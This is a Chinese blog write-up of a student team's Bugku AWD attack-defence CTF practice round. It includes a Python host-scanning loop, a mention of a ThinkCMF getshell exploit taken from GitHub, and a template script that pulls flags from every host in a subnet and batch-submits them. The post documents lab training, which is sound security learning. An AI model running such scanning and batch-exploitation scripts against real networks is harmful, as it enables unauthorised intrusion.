awd攻防训练赛1

最新推荐文章于 2024-05-15 16:31:47 发布
最新推荐文章于 2024-05-15 16:31:47 发布
阅读量2.8k 收藏 26
点赞数 7
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/117374744
版权

文章目录

前言

  学校战队的几个人简单尝试了一下bugku的线上awd攻防赛,做个记录。

1.服务器运维

  下载Web源码:xftp连接192-168-1-247.pvp254.bugku.cn/,在/var/www/html目录下有网站源代码.zip,下载。

  连接服务器主机:ssh连接服务器,以team2身份在根目录下寻找主机上的flag文件。

	find / -name "*flag*"

2.攻击环节

探测其他队伍主机

  编写Python脚本扫描存活主机:

import requests
for x in range(2,255):
    url = "http://192-168-1-{}.pvp254.bugku.cn/".format(x)
    try:
        r = requests.post(url)
        print(url)
    except:
        pass

  存活主机

http://192-168-1-135.pvp254.bugku.cn/
http://192-168-1-141.pvp254.bugku.cn/
http://192-168-1-247.pvp254.bugku.cn/	# 247是本机
攻击

  在Github上搜索thinkcmf漏洞,找到两个漏洞项目。
下载项目代码:ThinkCMF_getshell 框架上的任意内容包含漏洞,根据提示进行利用。
成功获取并提交flag,flag{b57cd1869b87b1aaeecd8d3a85a66835}。

  百度搜索,发现果然像学长说得,Web不可能单单只有一个漏洞。
只需要普通注册用户,存在 前台SQL注入、前台代码执行、前台文件上传 等漏洞。

  本想编写py脚本,批量利用漏洞并批量提交flag,发现bugku会对这样的行为封禁IP。。
意识到以后验证猜测,又被封了一个IP。

总结反思

  不足:没有连接mysql数据库,没有接触弱口令的修复、利用。

  增强信心:Web漏洞不只一个,会有多个Web漏洞。

  赛后简单地写了一个脚本,可以作为Web服务探测、批量利用提交的模板。

import requests

def http_detect(url):  # 在局域网中寻找Web服务
    for x in range(256):    # 填充地址
        url = url.format(x)
        try:
            r = requests.post(url)
            print(url)
        except:
            pass

def batch_flag(url):       # 功能:批量请求flag,并批量提交。输入:Web服务的模板地址。
    for x in range(256):
        url = url.format(x)

        try:    # 获取flag的Payload
            r = requests.post(url).text
            flag = r[r.find("flag{"):-6]
            print(flag)

            r = requests.post("https://ctf.bugku.com/pvp/submit.html?token=65af75ca919cc1f73e21aec9cf417b92&flag={}".format(flag))
            print(r.text)
        except:
            pass

if __name__ == '__main__":  # 两处输入:url地址模板,以及payload函数
    url = ""        # URL地址模板,例如http://192.168.1.{}
    # http_detect(url)
    # batch_flag(url)
区块链市场观察家
关注
  • 7
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
Bugku线上AWD脚本
Mark的博客
10-27 2554
Bugku手写小脚本(大佬就不用看了,鄙人水平有限) 首先是检测网站存活脚本 import urllib.request import time opener = urllib.request.build_opener() opener.addheaders = [('User-agent', 'Mozilla/49.0.2')] for n in range(1,255): nb = str(n) target = 'http://192-168-1-'+nb+'.awd.bugku
2024年最全搭建CTF-AWD训练平台_by hence zhang@lancet,2024年最新熬夜整理最新大厂C C++高频面试题
最新发布
2401_84978595的博客
05-15 365
Flag 提交: 172.17.0.6:80/flag_file.php?token=teamx&flag=xxxx (x为你们的队伍号)比赛规则(新):1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接;2.每台docker主机上运行一个web服务或者其他的服务,需要选手保证其可用性,并尝试审计代码,攻击其他队伍;3.比赛开始后,前30分钟,选手维护各自的主机,在这个阶段,所有的攻击和服务不可用不影响分数;:端口/fflag_file.php?
bugku很基础的AWD答题思路
qq_57147160的博客
12-24 2811
首先我们先来进行登录自己的靶机查看存在什么漏洞,其实在比赛当中靶机的漏洞都是一样的,所以一定要先去看自己的靶机: 这是ip地址和端口号。 密码和账号也会告诉你: 现在我们来进行登录: 登录成功,但是可以看到不是最高权限。 但是也可以进行大体分析漏洞了。 首先我们来看一下网站: 这样的一个网站,随后我们先到网站中看一下有什么样的漏洞: 首先我们 就在include中发现一个一句话木马。 我们来连接一下看能否使用: 连接的时候发现是可以使用的。...
BugKu -- AWD --初探门路
jiuyongpinyin的博客
02-24 1484
BugKu -- AWD
一个awd训练平台
qq_44657899的博客
10-26 9982
前言 如果是第一次打awd,那么使用这个平台是非常好的选择,下面我将我使用这个平台的过程和踩得坑一一列举,希望对其他awd新手有所帮助。 介绍这个平台的博客很多,我感觉这位师傅写的比较好,我刚开始就是看的这些博客学习如何使用: AWD线下攻防平台搭建 AWD线下攻防环境使用 文章目录前言0x01 环境配置-安装docker0x02 环境配置-配置加速服务器0x03 平台搭建0x04 平台使用0x05 一些小问题 0x01 环境配置-安装docker 我安装docker都是按下面这篇文章来的,一个命令一个命令
安恒四月月赛DASCTF-Misc Write Up
阿鱼的小世界
04-29 2426
参考资料 http://www.ga1axy.top/index.php/archives/28/ https://shimo.im/docs/WjVJd6pqy8dWxd6w/ Misc 6G还远吗(签到题) 开始点击下载后发现文件接近3.45G,而且下载速度贼慢,上面显示下完需要7.8个小时不过我们比赛时间只有四个小时 于是现将文件的部分下载下来载入010中可以看到flag 涉...
AWD攻防比赛 webshell
04-01
webshell,通过网页获取主机资源
AWD攻防比赛 PHP WAF
09-07
AWD攻防比赛 PHP WAF 超强waf,防读flag 比赛用基本可以完美防住
awd网络攻防比赛平台.zip
09-30
比赛项目代码
BugKu -- AWD --S1排位赛-2
jiuyongpinyin的博客
04-06 621
这道题目的做法和渗透测试1的做法差不多,后台界面也是同一个,包括上传shell的方法,所以这道题目的难度并不是很大。
Bugku S3 AWD排位赛-3(带你入门awd流程)
Welcome To Myon'Blog !
09-03 2983
1、注意事项 2、xshell连接与html目录下载 3、D盾与河马的使用(文件扫描) 4、Seay的使用(代码审计) 5、爆破对手的IP地址 6、其他 (1)mysql远程访问漏洞 (2)Redis未授权访问漏洞 (3)pwn漏洞
bugku-awd 初体验
CHAWUCIREN1的博客
05-26 6850
昨天第一次尝试打bugkuawd,菜的一批,加固时间全用来登录了,忙活半天 看到下面页面以后 putty连接 注意事项: 这个ip和普通ip有差别:192-168-1-124.pvp233.bugku.cn 注意端口是2222 连上以后,用户名输team+你的编号,比如我的用户名是team1 密码的话如果不想手输,可以shift+insert粘贴(注意:在Linux中不能用ctrl+v进行粘贴) putty如果长时间不进行操作可能会掉线,如果遇见没反应的话,不要慌,关了重新登录就行
记一次bugku awd pwn题解4月19日
z1r0的博客
04-19 1329
记一次bugku awd pwn题解4月19日 在昨天还是前天的时候看到今天19:00有人开了一个awd房间,闲得没事就准备今天打着玩玩,结果前一个小时在玩忘记到了时间。。。。。 打开房间的时候发现时间已经过了一会了(XD 先连到端口看一下pwn的题目,很像个堆的题目,靶机上的libc是2.27-1.4的 看到保护什么都没有开的时候就猜到应该是写shellcode了。 这里可以内存泄露 这里可以通过buf来劫持heap_ptr这个指针。 接下来笔者还用到的一个地方就是这个释放功能 攻击思路: 因
Bugku检测存活网站脚本————Two检测脚本升级版
Mark的博客
11-09 776
#生成网站 import urllib.request import time opener = urllib.request.build_opener() opener.addheaders = [('User-agent', 'Mozilla/49.0.2')] for n in range(1,255): nb = str(n) target = '192-168-1-'+nb+'.awd.bugku.cn/' new = open('H:/Python3.0Work/A
AWD练习平台搭建 & 附虚拟机资源
monster663的博客
06-04 3241
最近需要准备线下AWD了,但是没有那么多金币每天上BugKu的PVP在线AWD对战进行练习,于是想着可以自己搭建一个团队内部使用的AWD攻防平台,浅浅的记录一下。
BUGKU-CTF入门笔记
Emooooor的博客
12-05 611
CTF、BUGKU、入门、夺旗赛、网络安全、web安全
easycms v5.5 分析 | Bugku S3 AWD排位赛
qq_56313338的博客
09-15 1014
bugku awd中的cmseasy 5.5代码审计,分析路由规则,sql注入分析,不登陆进行文件上传getshell
AWD攻防系统框架有那些
03-25
常见的AWD攻防系统框架包括以下几种: 1. FBCTF:一个基于CTF比赛的AWD攻防系统,在网络分布式安全测试中广泛使用。 2. iCTF:一个开源的CTF比赛管理平台和AWD攻防系统,支持多个团队同时进行攻击和防御。 3. PwnCloud:一个基于云计算的AWD攻防系统,支持团队合作和实时攻击和防御。 4. Th3inspector:一个基于Web的AWD攻防系统,使用Firefox浏览器负责管理客户端,支持多种攻击方式和协议。 5. T-vision:一个面向企业级的AWD攻防系统,采用可视化界面管理多个主机的网络安全,支持多个团队并发作战。 6. Defender:一个专业的安全防御解决方案,提供全面的网络安全监控和攻击事件响应能力,适用于企业内部安全管理和外部渗透测试。 这些AWD攻防系统框架主要用于帮助人们模拟实际网络环境中的攻击和防御,提升网络安全意识和技术水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值